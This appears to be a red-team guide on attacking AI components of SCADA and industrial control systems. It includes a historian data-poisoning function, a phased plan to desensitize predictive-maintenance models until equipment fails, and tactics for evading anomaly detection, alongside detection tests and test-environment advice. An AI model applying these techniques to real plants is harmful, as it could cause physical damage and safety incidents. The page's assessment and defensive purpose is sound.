SCADA/ICS + AI Attacks
Attacking AI systems integrated with SCADA and industrial control systems: sensor data poisoning, control logic manipulation, HMI AI exploitation, and adversarial attacks on predictive maintenance models.
SCADA (Supervisory Control and Data Acquisition) and ICS (Industrial Control Systems) have been integrating AI capabilities at an accelerating pace. AI is used for predictive maintenance, process optimization, anomaly detection, and increasingly for autonomous control decisions. Each integration point creates a new attack surface where the deterministic, safety-engineered behavior of industrial systems meets the probabilistic, manipulable behavior of AI models.
This page covers attack techniques specific to the SCADA/ICS-AI intersection. The attacks described here target the AI components, not the underlying industrial protocols (Modbus, DNP3, OPC UA) — for traditional ICS protocol attacks, refer to established ICS security resources.
Sensor Data Poisoning
The Sensor-to-AI Pipeline
AI models in SCADA environments consume data from physical sensors — temperature probes, pressure transducers, flow meters, vibration sensors, voltage monitors, and hundreds of other measurement devices. The pipeline from physical measurement to AI input includes multiple points where data can be manipulated:
Physical Process
|
Sensor (analog measurement)
|
Signal Conditioner (amplification, filtering)
|
A/D Converter (digitization)
|
PLC/RTU (local processing, scaling)
|
Historian (time-series storage)
|
Data Pipeline (ETL, normalization)
|
AI Model (inference)
|
Control Decision (output to actuators)
Each stage in this pipeline presents a different poisoning opportunity with different access requirements and detectability levels.
Poisoning Techniques
Historian-level poisoning:
The historian (a time-series database that stores all sensor readings) is often the most accessible poisoning target. Historians frequently sit on the IT/OT boundary and may have weaker access controls than the PLCs and RTUs they collect data from.
# Demonstrating historian-level data poisoning
# Target: Predictive maintenance model for industrial pump
def poison_historian_data(historian_connection, target_sensor,
poison_strategy):
"""
Inject manipulated readings into the historian to
affect AI model training or inference.
WARNING: Test environment only.
"""
if poison_strategy == "gradual_drift":
# Slowly shift readings to desensitize the AI
# to changes that should trigger maintenance alerts
for hour in range(720): # 30 days
original = historian_connection.read_latest(target_sensor)
drift_amount = 0.001 * hour # gradual increase
poisoned_value = original + drift_amount
historian_connection.inject(
sensor=target_sensor,
value=poisoned_value,
timestamp=current_time(),
)
elif poison_strategy == "noise_injection":
# Add noise to sensor readings to reduce AI model
# confidence in anomaly detection
import random
for reading in historian_connection.stream(target_sensor):
noise = random.gauss(0, reading.value * 0.05)
historian_connection.modify(
reading_id=reading.id,
new_value=reading.value + noise,
)
elif poison_strategy == "label_flipping":
# If the historian stores labeled events (e.g., "fault"
# vs "normal"), flip labels to confuse training
events = historian_connection.get_labeled_events(target_sensor)
flip_count = int(len(events) * 0.1) # flip 10%
for event in random.sample(events, flip_count):
new_label = "normal" if event.label == "fault" else "fault"
historian_connection.update_label(event.id, new_label)Network-level poisoning:
If the attacker has access to the OT network, they can intercept and modify sensor readings in transit between PLCs/RTUs and the historian or AI platform:
- Man-in-the-middle on Modbus TCP — Modbus has no authentication or encryption; readings can be modified in transit
- OPC UA subscription manipulation — If OPC UA is used, manipulating subscription data requires compromising the OPC UA server or intercepting unencrypted sessions
- DNP3 spoofing — Injecting spoofed DNP3 responses to provide false readings to the master station
Detecting Sensor Poisoning
Red team assessments should also evaluate the operator's ability to detect sensor data poisoning:
# Detection capability assessment
detection_tests = {
"physics_consistency": {
"description": "Does the AI cross-reference sensor readings "
"against physical laws?",
"test": "Inject readings that are physically impossible "
"(e.g., temperature above boiling point in an "
"unpressurized water system)",
"expected_defense": "AI flags physically inconsistent readings",
},
"cross_sensor_validation": {
"description": "Does the AI validate readings against "
"correlated sensors?",
"test": "Poison one temperature sensor while leaving "
"adjacent sensors unmodified",
"expected_defense": "AI detects disagreement between "
"correlated sensors",
},
"rate_of_change_limits": {
"description": "Does the AI enforce physically plausible "
"rates of change?",
"test": "Inject a sudden step change in a sensor that "
"should only change gradually (e.g., tank level)",
"expected_defense": "AI flags impossible rate of change",
},
}Predictive Maintenance AI Manipulation
Delayed Maintenance Attacks
Predictive maintenance AI monitors equipment health indicators (vibration, temperature, acoustic emissions, oil analysis) and predicts when maintenance is needed. An attacker who manipulates the AI to delay maintenance recommendations can cause equipment failures.
# Predictive maintenance manipulation attack chain
maintenance_attack = {
"phase_1_baseline": {
"description": "Observe normal maintenance prediction patterns",
"duration": "2-4 weeks",
"objective": "Understand which sensor readings trigger "
"maintenance alerts and their thresholds",
},
"phase_2_desensitization": {
"description": "Gradually shift 'normal' readings toward "
"fault thresholds to desensitize the model",
"duration": "4-8 weeks",
"technique": "Small daily increases in vibration or temperature "
"readings that the model incorporates as the "
"new normal baseline",
},
"phase_3_masking": {
"description": "When real fault indicators appear, the model "
"does not recognize them because its baseline "
"has been shifted",
"outcome": "Equipment continues operating past its safe "
"maintenance window",
},
"phase_4_failure": {
"description": "Equipment fails because maintenance was "
"not performed when needed",
"impact": "Unplanned downtime, potential safety incident, "
"cascading failures in interconnected systems",
},
}False Alert Generation
The inverse attack — generating false maintenance alerts — wastes maintenance resources and erodes operator trust in the AI:
- Alert fatigue: Repeated false alerts cause operators to ignore or disable the AI alerting system
- Resource exhaustion: Maintenance teams are dispatched for unnecessary equipment inspections
- Scheduled downtime manipulation: False alerts that trigger planned maintenance outages at strategically chosen times
HMI AI Overlay Attacks
Manipulating Operator Decision Support
Modern SCADA HMIs (Human-Machine Interfaces) increasingly include AI overlays that assist operators with decision-making — highlighting anomalies, suggesting responses to alarms, and providing predictive status information. These overlays affect how operators perceive and respond to the process state.
Perception manipulation attacks:
| Attack | Description | Operator Impact |
|---|---|---|
| False normality | AI overlay displays "normal" status while underlying readings indicate a fault | Operator trusts AI and does not investigate |
| Alert suppression | AI de-prioritizes or groups critical alerts so operators miss them | Critical alarm buried in noise |
| Suggested action manipulation | AI suggests incorrect response to a genuine alarm | Operator follows AI suggestion, worsening the situation |
| Trend line manipulation | AI-generated trend predictions show stable operation when degradation is occurring | Operator does not anticipate upcoming failure |
# Testing HMI AI overlay for manipulation
def test_hmi_ai_overlay(hmi_system, scenarios):
"""
Present the HMI AI with scenarios that should trigger
specific operator alerts and verify correct behavior.
"""
results = []
for scenario in scenarios:
# Inject the scenario sensor readings
hmi_system.inject_readings(scenario.sensor_data)
# Capture what the AI overlay presents to the operator
overlay_output = hmi_system.get_overlay_display()
# Compare AI presentation against ground truth
result = {
"scenario": scenario.name,
"ground_truth_status": scenario.actual_status,
"ai_displayed_status": overlay_output.status,
"correct": overlay_output.status == scenario.actual_status,
"alerts_shown": overlay_output.active_alerts,
"expected_alerts": scenario.expected_alerts,
"alerts_correct": set(overlay_output.active_alerts) ==
set(scenario.expected_alerts),
"suggested_actions": overlay_output.suggested_actions,
"suggested_actions_safe": all(
action in scenario.safe_actions
for action in overlay_output.suggested_actions
),
}
results.append(result)
return resultsAI-Based Anomaly Detection Evasion
Evading SCADA Anomaly Detection
AI anomaly detection in SCADA environments monitors network traffic, process behavior, and operator actions for indicators of compromise. An attacker who has gained access to the OT network must evade these AI-based detection systems.
Evasion strategies:
-
Low-and-slow manipulation. Make changes small enough that each individual change falls within the AI's normal variation threshold. Over time, the cumulative effect is significant but no single change triggers an alert.
-
Mimicry attacks. Study the normal communication patterns and process behavior, then make attacks that mimic normal operations. For example, send control commands at the same rate and with the same patterns as legitimate operator actions.
-
Timing-based evasion. Execute attacks during process transitions (startup, shutdown, load changes) when sensor readings are naturally variable and the AI's anomaly thresholds are wider.
-
Model confusion. Send a burst of genuinely anomalous but benign traffic to trigger alerts and consume operator attention, then execute the real attack while operators are investigating false leads.
Testing Environment Requirements
Red team testing of SCADA/ICS AI requires specialized test environments:
Hardware-in-the-loop simulation
Use physical PLCs and RTUs connected to process simulators that model the physical behavior of the controlled process. Software-only simulations may not accurately represent the timing and behavior of real industrial equipment.
Network isolation verification
Verify that the test environment has no connectivity to production OT networks. Use physically separate network infrastructure, not just VLANs or firewalls.
Safety system testing
Test that safety instrumented systems (SIS) correctly override AI decisions when safety limits are exceeded. The SIS must function independently of the AI — if the AI can disable or influence the SIS, that is a critical finding.
Operator training integration
Include operators in the testing process. Present operators with scenarios where the AI is being manipulated and evaluate whether operators can detect the manipulation through independent observation.
Further Reading
- Critical Infrastructure AI Security Overview — Broader critical infrastructure context
- Power Grid AI — Energy sector AI attacks
- Transportation AI — Transportation sector AI attacks
- AI Incident Response Playbooks — How to respond to AI security incidents